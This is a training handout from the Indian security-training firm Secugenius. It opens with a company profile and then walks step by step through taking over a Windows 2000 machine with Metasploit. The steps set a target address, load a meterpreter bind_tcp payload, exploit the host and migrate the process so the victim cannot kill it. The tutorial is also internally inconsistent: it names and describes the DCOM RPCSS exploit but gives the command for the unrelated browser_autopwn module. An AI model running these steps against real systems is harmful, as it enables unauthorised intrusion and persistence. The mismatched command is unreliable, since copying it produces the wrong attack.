SECUGENIUS SECURITY SOLUTIONS --------------------------------------------------------------------------------------
(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)
Company Profile: Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius Security Solutions are providing training in Information Security and various professional courses. Secugenius Security Solutions is an organization which believes in inventing and implementing new ideas to influence the technological minds of the youngsters Looking at the number of Cyber Crimes since last many years, We at Secugenius Security Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank Employees, Police officials. Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the benefit of the students & making them aware of the latest trends in technological era of the Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime Investigation & Forensic Sciences Secugenius provides various security solutions to its clients by securing their websites from cyber attacks. We provide training to college students, graduates and professionals in various fields. Education is delivered to students through two modes i.e. Regular mode and Distance mode which are available as short term and long term courses. In the workshops conducted by Secugenius, participants can claim to be trained by the highly experienced & skilled corporate trainers from different parts of the nation. We believe in making the base of students to be as strong as possible. All the modules have been designed in order to provide students with specialized knowledge by specialized trainers. This library was furnished, managed and funded by the Founders and Directors of Secugenius Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security Solutions.
This Online Digital Library has been initiated as a free resource & permanent resource on specialization basis for every student of Team Secugenius.
Hack Windows 2000 with Metasploit Product ID No: SG/ODL/13020 Founder & Director: Harpreet Khattar & Kshitij Adhlakha Resource Person: Chetan Soni Secugenius Security Solutions SCO-13A, Model Town Extn, Near Krishna Mandir, Ludhiana-141002, Punjab – India
[email protected],
[email protected] www.secugenius.com , www.seculabs.in
What is Metasploit? Metasploit is a framework which is used for the hacking of different kinds of applications, operating systems, web applications etc. Metasploit contains various exploits, scanners, payloads, modules, auxiliaires, vulnerability assessments etc.
Requirements:
VULNERABILITY EXPLOIT PAYLOAD
Vulnerability is a weakness or hole of the system through which an attacker enters into the machine. Exploit is a program or code which takes the advantage of the vulnerability to break the security of system. Payload is a program which gives control of the system.
Step 1
–
Power on your Backtrack Operating System with Username=root and Password=toor (By Default) After login to this, Type “startx” for entering into GUI Mode. Step 2
–
Now For Hacking Windows, You have to Start Metasploit Framework. So Open your terminal and type this command, root@bt:~# msfconsole
Step 3 Now For hacking windows 2000, we use this exploit named as dcom exploit –
root@bt:~# use auxiliary/server/browser_autopwn This module exploits a stack buffer overflow in the RPCSS service, this vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)
Step 4
–
Now Type “show options” to check all options related to this exploit
Step 5
–
Now you have to set your target by typing this command, root@bt:~# set RHOST 192.168.17.135
Step 6
–
Now Set your payload by typing this command, root@bt:~# set payload windows/meterpreter/bind_tcp
Step 7
–
Now Type “exploit” command in your terminal for attacking. If everything is done correctly, a meterpreter shell will appear on the target system.
Step 8
–
Now Type “sysinfo” for checking target system’ s information.
From this point, the server is under our control. But to prevent the user kill our meterpreter process we must quickly migrate to the other services running by typing this command “migrate
” To show the running process on the target system type “ps” .
